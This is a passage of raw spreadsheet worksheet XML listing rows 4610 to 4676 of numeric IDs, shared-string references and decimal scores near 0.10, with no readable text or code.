    <row r="4610" ht="15.75" customHeight="1">
      <c r="A4610" s="1">
        <v>19920.0</v>
      </c>
      <c r="B4610" s="2">
        <v>5.7418422E7</v>
      </c>
      <c r="C4610" s="2" t="s">
        <v>4396</v>
      </c>
      <c r="D4610" s="2">
        <v>1.0</v>
      </c>
      <c r="E4610" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4610" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="4611" ht="15.75" customHeight="1">
      <c r="A4611" s="1">
        <v>24285.0</v>
      </c>
      <c r="B4611" s="2">
        <v>1.0550809E7</v>
      </c>
      <c r="C4611" s="2" t="s">
        <v>4397</v>
      </c>
      <c r="D4611" s="2">
        <v>1.0</v>
      </c>
      <c r="E4611" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4611" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="4612" ht="15.75" customHeight="1">
      <c r="A4612" s="1">
        <v>30515.0</v>
      </c>
      <c r="B4612" s="2">
        <v>4.0121897E7</v>
      </c>
      <c r="C4612" s="2" t="s">
        <v>4398</v>
      </c>
      <c r="D4612" s="2">
        <v>1.0</v>
      </c>
      <c r="E4612" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4612" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="4613" ht="15.75" customHeight="1">
      <c r="A4613" s="1">
        <v>33847.0</v>
      </c>
      <c r="B4613" s="2">
        <v>9017431.0</v>
      </c>
      <c r="C4613" s="2" t="s">
        <v>4399</v>
      </c>
      <c r="D4613" s="2">
        <v>1.0</v>
      </c>
      <c r="E4613" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4613" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="4614" ht="15.75" customHeight="1">
      <c r="A4614" s="1">
        <v>14638.0</v>
      </c>
      <c r="B4614" s="2">
        <v>4.0340544E7</v>
      </c>
      <c r="C4614" s="2" t="s">
        <v>4400</v>
      </c>
      <c r="D4614" s="2">
        <v>1.0</v>
      </c>
      <c r="E4614" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4614" s="2">
        <v>0.1019900497512438</v>
      </c>
    </row>
    <row r="4615" ht="15.75" customHeight="1">
      <c r="A4615" s="1">
        <v>29.0</v>
      </c>
      <c r="B4615" s="2">
        <v>1.0523683E7</v>
      </c>
      <c r="C4615" s="2" t="s">
        <v>4401</v>
      </c>
      <c r="D4615" s="2">
        <v>1.0</v>
      </c>
      <c r="E4615" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4615" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="4616" ht="15.75" customHeight="1">
      <c r="A4616" s="1">
        <v>4230.0</v>
      </c>
      <c r="B4616" s="2">
        <v>4.1752036E7</v>
      </c>
      <c r="C4616" s="2" t="s">
        <v>4402</v>
      </c>
      <c r="D4616" s="2">
        <v>1.0</v>
      </c>
      <c r="E4616" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4616" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="4617" ht="15.75" customHeight="1">
      <c r="A4617" s="1">
        <v>6888.0</v>
      </c>
      <c r="B4617" s="2">
        <v>4.977428E7</v>
      </c>
      <c r="C4617" s="2" t="s">
        <v>4403</v>
      </c>
      <c r="D4617" s="2">
        <v>1.0</v>
      </c>
      <c r="E4617" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4617" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="4618" ht="15.75" customHeight="1">
      <c r="A4618" s="1">
        <v>9881.0</v>
      </c>
      <c r="B4618" s="2">
        <v>5.6749085E7</v>
      </c>
      <c r="C4618" s="2" t="s">
        <v>4404</v>
      </c>
      <c r="D4618" s="2">
        <v>1.0</v>
      </c>
      <c r="E4618" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4618" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="4619" ht="15.75" customHeight="1">
      <c r="A4619" s="1">
        <v>10188.0</v>
      </c>
      <c r="B4619" s="2">
        <v>5.7391813E7</v>
      </c>
      <c r="C4619" s="2" t="s">
        <v>4405</v>
      </c>
      <c r="D4619" s="2">
        <v>1.0</v>
      </c>
      <c r="E4619" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4619" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="4620" ht="15.75" customHeight="1">
      <c r="A4620" s="1">
        <v>12522.0</v>
      </c>
      <c r="B4620" s="2">
        <v>2.9701388E7</v>
      </c>
      <c r="C4620" s="2" t="s">
        <v>4406</v>
      </c>
      <c r="D4620" s="2">
        <v>1.0</v>
      </c>
      <c r="E4620" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4620" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="4621" ht="15.75" customHeight="1">
      <c r="A4621" s="1">
        <v>13775.0</v>
      </c>
      <c r="B4621" s="2">
        <v>3.6554862E7</v>
      </c>
      <c r="C4621" s="2" t="s">
        <v>4407</v>
      </c>
      <c r="D4621" s="2">
        <v>1.0</v>
      </c>
      <c r="E4621" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4621" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="4622" ht="15.75" customHeight="1">
      <c r="A4622" s="1">
        <v>19442.0</v>
      </c>
      <c r="B4622" s="2">
        <v>5.5717081E7</v>
      </c>
      <c r="C4622" s="2" t="s">
        <v>4408</v>
      </c>
      <c r="D4622" s="2">
        <v>1.0</v>
      </c>
      <c r="E4622" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4622" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="4623" ht="15.75" customHeight="1">
      <c r="A4623" s="1">
        <v>27499.0</v>
      </c>
      <c r="B4623" s="2">
        <v>2.2067601E7</v>
      </c>
      <c r="C4623" s="2" t="s">
        <v>4409</v>
      </c>
      <c r="D4623" s="2">
        <v>1.0</v>
      </c>
      <c r="E4623" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4623" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="4624" ht="15.75" customHeight="1">
      <c r="A4624" s="1">
        <v>5277.0</v>
      </c>
      <c r="B4624" s="2">
        <v>4.5163803E7</v>
      </c>
      <c r="C4624" s="2" t="s">
        <v>4410</v>
      </c>
      <c r="D4624" s="2">
        <v>1.0</v>
      </c>
      <c r="E4624" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4624" s="2">
        <v>0.1016771488469602</v>
      </c>
    </row>
    <row r="4625" ht="15.75" customHeight="1">
      <c r="A4625" s="1">
        <v>12219.0</v>
      </c>
      <c r="B4625" s="2">
        <v>2.7729591E7</v>
      </c>
      <c r="C4625" s="2" t="s">
        <v>4411</v>
      </c>
      <c r="D4625" s="2">
        <v>1.0</v>
      </c>
      <c r="E4625" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4625" s="2">
        <v>0.1016771488469602</v>
      </c>
    </row>
    <row r="4626" ht="15.75" customHeight="1">
      <c r="A4626" s="1">
        <v>12419.0</v>
      </c>
      <c r="B4626" s="2">
        <v>2.9123022E7</v>
      </c>
      <c r="C4626" s="2" t="s">
        <v>4412</v>
      </c>
      <c r="D4626" s="2">
        <v>1.0</v>
      </c>
      <c r="E4626" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4626" s="2">
        <v>0.1016771488469602</v>
      </c>
    </row>
    <row r="4627" ht="15.75" customHeight="1">
      <c r="A4627" s="1">
        <v>1943.0</v>
      </c>
      <c r="B4627" s="2">
        <v>3.0209741E7</v>
      </c>
      <c r="C4627" s="2" t="s">
        <v>4413</v>
      </c>
      <c r="D4627" s="2">
        <v>1.0</v>
      </c>
      <c r="E4627" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4627" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="4628" ht="15.75" customHeight="1">
      <c r="A4628" s="1">
        <v>2256.0</v>
      </c>
      <c r="B4628" s="2">
        <v>3.2364423E7</v>
      </c>
      <c r="C4628" s="2" t="s">
        <v>4414</v>
      </c>
      <c r="D4628" s="2">
        <v>1.0</v>
      </c>
      <c r="E4628" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4628" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="4629" ht="15.75" customHeight="1">
      <c r="A4629" s="1">
        <v>6336.0</v>
      </c>
      <c r="B4629" s="2">
        <v>4.8296413E7</v>
      </c>
      <c r="C4629" s="2" t="s">
        <v>4415</v>
      </c>
      <c r="D4629" s="2">
        <v>1.0</v>
      </c>
      <c r="E4629" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4629" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="4630" ht="15.75" customHeight="1">
      <c r="A4630" s="1">
        <v>7700.0</v>
      </c>
      <c r="B4630" s="2">
        <v>5.1971682E7</v>
      </c>
      <c r="C4630" s="2" t="s">
        <v>4416</v>
      </c>
      <c r="D4630" s="2">
        <v>1.0</v>
      </c>
      <c r="E4630" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4630" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="4631" ht="15.75" customHeight="1">
      <c r="A4631" s="1">
        <v>15644.0</v>
      </c>
      <c r="B4631" s="2">
        <v>4.3605661E7</v>
      </c>
      <c r="C4631" s="2" t="s">
        <v>4417</v>
      </c>
      <c r="D4631" s="2">
        <v>1.0</v>
      </c>
      <c r="E4631" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4631" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="4632" ht="15.75" customHeight="1">
      <c r="A4632" s="1">
        <v>15963.0</v>
      </c>
      <c r="B4632" s="2">
        <v>4.4787499E7</v>
      </c>
      <c r="C4632" s="2" t="s">
        <v>4418</v>
      </c>
      <c r="D4632" s="2">
        <v>1.0</v>
      </c>
      <c r="E4632" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4632" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="4633" ht="15.75" customHeight="1">
      <c r="A4633" s="1">
        <v>16852.0</v>
      </c>
      <c r="B4633" s="2">
        <v>4.7910396E7</v>
      </c>
      <c r="C4633" s="2" t="s">
        <v>4419</v>
      </c>
      <c r="D4633" s="2">
        <v>1.0</v>
      </c>
      <c r="E4633" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4633" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="4634" ht="15.75" customHeight="1">
      <c r="A4634" s="1">
        <v>354.0</v>
      </c>
      <c r="B4634" s="2">
        <v>1.6047552E7</v>
      </c>
      <c r="C4634" s="2" t="s">
        <v>4420</v>
      </c>
      <c r="D4634" s="2">
        <v>1.0</v>
      </c>
      <c r="E4634" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4634" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4635" ht="15.75" customHeight="1">
      <c r="A4635" s="1">
        <v>397.0</v>
      </c>
      <c r="B4635" s="2">
        <v>1664707.0</v>
      </c>
      <c r="C4635" s="2" t="s">
        <v>4421</v>
      </c>
      <c r="D4635" s="2">
        <v>1.0</v>
      </c>
      <c r="E4635" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4635" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4636" ht="15.75" customHeight="1">
      <c r="A4636" s="1">
        <v>415.0</v>
      </c>
      <c r="B4636" s="2">
        <v>1.6783456E7</v>
      </c>
      <c r="C4636" s="2" t="s">
        <v>4422</v>
      </c>
      <c r="D4636" s="2">
        <v>1.0</v>
      </c>
      <c r="E4636" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4636" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4637" ht="15.75" customHeight="1">
      <c r="A4637" s="1">
        <v>543.0</v>
      </c>
      <c r="B4637" s="2">
        <v>1.8727367E7</v>
      </c>
      <c r="C4637" s="2" t="s">
        <v>4423</v>
      </c>
      <c r="D4637" s="2">
        <v>1.0</v>
      </c>
      <c r="E4637" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4637" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4638" ht="15.75" customHeight="1">
      <c r="A4638" s="1">
        <v>823.0</v>
      </c>
      <c r="B4638" s="2">
        <v>2.1513988E7</v>
      </c>
      <c r="C4638" s="2" t="s">
        <v>4424</v>
      </c>
      <c r="D4638" s="2">
        <v>1.0</v>
      </c>
      <c r="E4638" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4638" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4639" ht="15.75" customHeight="1">
      <c r="A4639" s="1">
        <v>920.0</v>
      </c>
      <c r="B4639" s="2">
        <v>2.2271455E7</v>
      </c>
      <c r="C4639" s="2" t="s">
        <v>4425</v>
      </c>
      <c r="D4639" s="2">
        <v>1.0</v>
      </c>
      <c r="E4639" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4639" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4640" ht="15.75" customHeight="1">
      <c r="A4640" s="1">
        <v>954.0</v>
      </c>
      <c r="B4640" s="2">
        <v>2.2638736E7</v>
      </c>
      <c r="C4640" s="2" t="s">
        <v>4426</v>
      </c>
      <c r="D4640" s="2">
        <v>1.0</v>
      </c>
      <c r="E4640" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4640" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4641" ht="15.75" customHeight="1">
      <c r="A4641" s="1">
        <v>1107.0</v>
      </c>
      <c r="B4641" s="2">
        <v>2.4026994E7</v>
      </c>
      <c r="C4641" s="2" t="s">
        <v>4427</v>
      </c>
      <c r="D4641" s="2">
        <v>1.0</v>
      </c>
      <c r="E4641" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4641" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4642" ht="15.75" customHeight="1">
      <c r="A4642" s="1">
        <v>1194.0</v>
      </c>
      <c r="B4642" s="2">
        <v>2.4738492E7</v>
      </c>
      <c r="C4642" s="2" t="s">
        <v>4428</v>
      </c>
      <c r="D4642" s="2">
        <v>1.0</v>
      </c>
      <c r="E4642" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4642" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4643" ht="15.75" customHeight="1">
      <c r="A4643" s="1">
        <v>1360.0</v>
      </c>
      <c r="B4643" s="2">
        <v>2.5975378E7</v>
      </c>
      <c r="C4643" s="2" t="s">
        <v>4429</v>
      </c>
      <c r="D4643" s="2">
        <v>1.0</v>
      </c>
      <c r="E4643" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4643" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4644" ht="15.75" customHeight="1">
      <c r="A4644" s="1">
        <v>1361.0</v>
      </c>
      <c r="B4644" s="2">
        <v>2.5975378E7</v>
      </c>
      <c r="C4644" s="2" t="s">
        <v>4430</v>
      </c>
      <c r="D4644" s="2">
        <v>1.0</v>
      </c>
      <c r="E4644" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4644" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4645" ht="15.75" customHeight="1">
      <c r="A4645" s="1">
        <v>1941.0</v>
      </c>
      <c r="B4645" s="2">
        <v>3.020714E7</v>
      </c>
      <c r="C4645" s="2" t="s">
        <v>4431</v>
      </c>
      <c r="D4645" s="2">
        <v>1.0</v>
      </c>
      <c r="E4645" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4645" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4646" ht="15.75" customHeight="1">
      <c r="A4646" s="1">
        <v>1975.0</v>
      </c>
      <c r="B4646" s="2">
        <v>3.0413539E7</v>
      </c>
      <c r="C4646" s="2" t="s">
        <v>4432</v>
      </c>
      <c r="D4646" s="2">
        <v>1.0</v>
      </c>
      <c r="E4646" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4646" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4647" ht="15.75" customHeight="1">
      <c r="A4647" s="1">
        <v>2346.0</v>
      </c>
      <c r="B4647" s="2">
        <v>3.305924E7</v>
      </c>
      <c r="C4647" s="2" t="s">
        <v>4433</v>
      </c>
      <c r="D4647" s="2">
        <v>1.0</v>
      </c>
      <c r="E4647" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4647" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4648" ht="15.75" customHeight="1">
      <c r="A4648" s="1">
        <v>2379.0</v>
      </c>
      <c r="B4648" s="2">
        <v>3.3319301E7</v>
      </c>
      <c r="C4648" s="2" t="s">
        <v>4434</v>
      </c>
      <c r="D4648" s="2">
        <v>1.0</v>
      </c>
      <c r="E4648" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4648" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4649" ht="15.75" customHeight="1">
      <c r="A4649" s="1">
        <v>2537.0</v>
      </c>
      <c r="B4649" s="2">
        <v>3.4107819E7</v>
      </c>
      <c r="C4649" s="2" t="s">
        <v>4435</v>
      </c>
      <c r="D4649" s="2">
        <v>1.0</v>
      </c>
      <c r="E4649" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4649" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4650" ht="15.75" customHeight="1">
      <c r="A4650" s="1">
        <v>2547.0</v>
      </c>
      <c r="B4650" s="2">
        <v>3.4122698E7</v>
      </c>
      <c r="C4650" s="2" t="s">
        <v>4436</v>
      </c>
      <c r="D4650" s="2">
        <v>1.0</v>
      </c>
      <c r="E4650" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4650" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4651" ht="15.75" customHeight="1">
      <c r="A4651" s="1">
        <v>2585.0</v>
      </c>
      <c r="B4651" s="2">
        <v>3.4322126E7</v>
      </c>
      <c r="C4651" s="2" t="s">
        <v>4437</v>
      </c>
      <c r="D4651" s="2">
        <v>1.0</v>
      </c>
      <c r="E4651" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4651" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4652" ht="15.75" customHeight="1">
      <c r="A4652" s="1">
        <v>2625.0</v>
      </c>
      <c r="B4652" s="2">
        <v>3.4516204E7</v>
      </c>
      <c r="C4652" s="2" t="s">
        <v>4438</v>
      </c>
      <c r="D4652" s="2">
        <v>1.0</v>
      </c>
      <c r="E4652" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4652" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4653" ht="15.75" customHeight="1">
      <c r="A4653" s="1">
        <v>2809.0</v>
      </c>
      <c r="B4653" s="2">
        <v>3.5361852E7</v>
      </c>
      <c r="C4653" s="2" t="s">
        <v>4439</v>
      </c>
      <c r="D4653" s="2">
        <v>1.0</v>
      </c>
      <c r="E4653" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4653" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4654" ht="15.75" customHeight="1">
      <c r="A4654" s="1">
        <v>2991.0</v>
      </c>
      <c r="B4654" s="2">
        <v>3.6250512E7</v>
      </c>
      <c r="C4654" s="2" t="s">
        <v>4440</v>
      </c>
      <c r="D4654" s="2">
        <v>1.0</v>
      </c>
      <c r="E4654" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4654" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4655" ht="15.75" customHeight="1">
      <c r="A4655" s="1">
        <v>3016.0</v>
      </c>
      <c r="B4655" s="2">
        <v>3.6397538E7</v>
      </c>
      <c r="C4655" s="2" t="s">
        <v>4441</v>
      </c>
      <c r="D4655" s="2">
        <v>1.0</v>
      </c>
      <c r="E4655" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4655" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4656" ht="15.75" customHeight="1">
      <c r="A4656" s="1">
        <v>3162.0</v>
      </c>
      <c r="B4656" s="2">
        <v>3.7024691E7</v>
      </c>
      <c r="C4656" s="2" t="s">
        <v>4442</v>
      </c>
      <c r="D4656" s="2">
        <v>1.0</v>
      </c>
      <c r="E4656" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4656" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4657" ht="15.75" customHeight="1">
      <c r="A4657" s="1">
        <v>3166.0</v>
      </c>
      <c r="B4657" s="2">
        <v>3.7031013E7</v>
      </c>
      <c r="C4657" s="2" t="s">
        <v>4443</v>
      </c>
      <c r="D4657" s="2">
        <v>1.0</v>
      </c>
      <c r="E4657" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4657" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4658" ht="15.75" customHeight="1">
      <c r="A4658" s="1">
        <v>3241.0</v>
      </c>
      <c r="B4658" s="2">
        <v>3.7364766E7</v>
      </c>
      <c r="C4658" s="2" t="s">
        <v>4444</v>
      </c>
      <c r="D4658" s="2">
        <v>1.0</v>
      </c>
      <c r="E4658" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4658" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4659" ht="15.75" customHeight="1">
      <c r="A4659" s="1">
        <v>3354.0</v>
      </c>
      <c r="B4659" s="2">
        <v>3.7813812E7</v>
      </c>
      <c r="C4659" s="2" t="s">
        <v>4445</v>
      </c>
      <c r="D4659" s="2">
        <v>1.0</v>
      </c>
      <c r="E4659" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4659" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4660" ht="15.75" customHeight="1">
      <c r="A4660" s="1">
        <v>3399.0</v>
      </c>
      <c r="B4660" s="2">
        <v>3.8028307E7</v>
      </c>
      <c r="C4660" s="2" t="s">
        <v>4446</v>
      </c>
      <c r="D4660" s="2">
        <v>1.0</v>
      </c>
      <c r="E4660" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4660" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4661" ht="15.75" customHeight="1">
      <c r="A4661" s="1">
        <v>3413.0</v>
      </c>
      <c r="B4661" s="2">
        <v>3.8121477E7</v>
      </c>
      <c r="C4661" s="2" t="s">
        <v>4447</v>
      </c>
      <c r="D4661" s="2">
        <v>1.0</v>
      </c>
      <c r="E4661" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4661" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4662" ht="15.75" customHeight="1">
      <c r="A4662" s="1">
        <v>3463.0</v>
      </c>
      <c r="B4662" s="2">
        <v>3.8335994E7</v>
      </c>
      <c r="C4662" s="2" t="s">
        <v>4448</v>
      </c>
      <c r="D4662" s="2">
        <v>1.0</v>
      </c>
      <c r="E4662" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4662" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4663" ht="15.75" customHeight="1">
      <c r="A4663" s="1">
        <v>3529.0</v>
      </c>
      <c r="B4663" s="2">
        <v>3.864171E7</v>
      </c>
      <c r="C4663" s="2" t="s">
        <v>4449</v>
      </c>
      <c r="D4663" s="2">
        <v>1.0</v>
      </c>
      <c r="E4663" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4663" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4664" ht="15.75" customHeight="1">
      <c r="A4664" s="1">
        <v>3549.0</v>
      </c>
      <c r="B4664" s="2">
        <v>3.8770045E7</v>
      </c>
      <c r="C4664" s="2" t="s">
        <v>4450</v>
      </c>
      <c r="D4664" s="2">
        <v>1.0</v>
      </c>
      <c r="E4664" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4664" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4665" ht="15.75" customHeight="1">
      <c r="A4665" s="1">
        <v>3666.0</v>
      </c>
      <c r="B4665" s="2">
        <v>3.9377544E7</v>
      </c>
      <c r="C4665" s="2" t="s">
        <v>4451</v>
      </c>
      <c r="D4665" s="2">
        <v>1.0</v>
      </c>
      <c r="E4665" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4665" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4666" ht="15.75" customHeight="1">
      <c r="A4666" s="1">
        <v>3769.0</v>
      </c>
      <c r="B4666" s="2">
        <v>3.9828853E7</v>
      </c>
      <c r="C4666" s="2" t="s">
        <v>4452</v>
      </c>
      <c r="D4666" s="2">
        <v>1.0</v>
      </c>
      <c r="E4666" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4666" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4667" ht="15.75" customHeight="1">
      <c r="A4667" s="1">
        <v>3796.0</v>
      </c>
      <c r="B4667" s="2">
        <v>3.9966706E7</v>
      </c>
      <c r="C4667" s="2" t="s">
        <v>4453</v>
      </c>
      <c r="D4667" s="2">
        <v>1.0</v>
      </c>
      <c r="E4667" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4667" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4668" ht="15.75" customHeight="1">
      <c r="A4668" s="1">
        <v>4016.0</v>
      </c>
      <c r="B4668" s="2">
        <v>4.0943684E7</v>
      </c>
      <c r="C4668" s="2" t="s">
        <v>4454</v>
      </c>
      <c r="D4668" s="2">
        <v>1.0</v>
      </c>
      <c r="E4668" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4668" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4669" ht="15.75" customHeight="1">
      <c r="A4669" s="1">
        <v>4047.0</v>
      </c>
      <c r="B4669" s="2">
        <v>4.1067489E7</v>
      </c>
      <c r="C4669" s="2" t="s">
        <v>4455</v>
      </c>
      <c r="D4669" s="2">
        <v>1.0</v>
      </c>
      <c r="E4669" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4669" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4670" ht="15.75" customHeight="1">
      <c r="A4670" s="1">
        <v>4133.0</v>
      </c>
      <c r="B4670" s="2">
        <v>4.1386573E7</v>
      </c>
      <c r="C4670" s="2" t="s">
        <v>4456</v>
      </c>
      <c r="D4670" s="2">
        <v>1.0</v>
      </c>
      <c r="E4670" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4670" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4671" ht="15.75" customHeight="1">
      <c r="A4671" s="1">
        <v>4134.0</v>
      </c>
      <c r="B4671" s="2">
        <v>4.1387443E7</v>
      </c>
      <c r="C4671" s="2" t="s">
        <v>4457</v>
      </c>
      <c r="D4671" s="2">
        <v>1.0</v>
      </c>
      <c r="E4671" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4671" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4672" ht="15.75" customHeight="1">
      <c r="A4672" s="1">
        <v>4407.0</v>
      </c>
      <c r="B4672" s="2">
        <v>4.228093E7</v>
      </c>
      <c r="C4672" s="2" t="s">
        <v>4458</v>
      </c>
      <c r="D4672" s="2">
        <v>1.0</v>
      </c>
      <c r="E4672" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4672" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4673" ht="15.75" customHeight="1">
      <c r="A4673" s="1">
        <v>4536.0</v>
      </c>
      <c r="B4673" s="2">
        <v>4.2659056E7</v>
      </c>
      <c r="C4673" s="2" t="s">
        <v>4459</v>
      </c>
      <c r="D4673" s="2">
        <v>1.0</v>
      </c>
      <c r="E4673" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4673" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4674" ht="15.75" customHeight="1">
      <c r="A4674" s="1">
        <v>4609.0</v>
      </c>
      <c r="B4674" s="2">
        <v>4.2905226E7</v>
      </c>
      <c r="C4674" s="2" t="s">
        <v>4460</v>
      </c>
      <c r="D4674" s="2">
        <v>1.0</v>
      </c>
      <c r="E4674" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4674" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4675" ht="15.75" customHeight="1">
      <c r="A4675" s="1">
        <v>4850.0</v>
      </c>
      <c r="B4675" s="2">
        <v>4.3721463E7</v>
      </c>
      <c r="C4675" s="2" t="s">
        <v>4461</v>
      </c>
      <c r="D4675" s="2">
        <v>1.0</v>
      </c>
      <c r="E4675" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4675" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4676" ht="15.75" customHeight="1">
      <c r="A4676" s="1">
        <v>4865.0</v>
      </c>
      <c r="B4676" s="2">
        <v>4.3818337E7</v>
      </c>
      <c r="C4676" s="2" t="s">
        <v>4462</v>
      </c>
      <c r="D4676" s="2">
        <v>1.0</v>
      </c>
      <c r="E4676" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4676" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
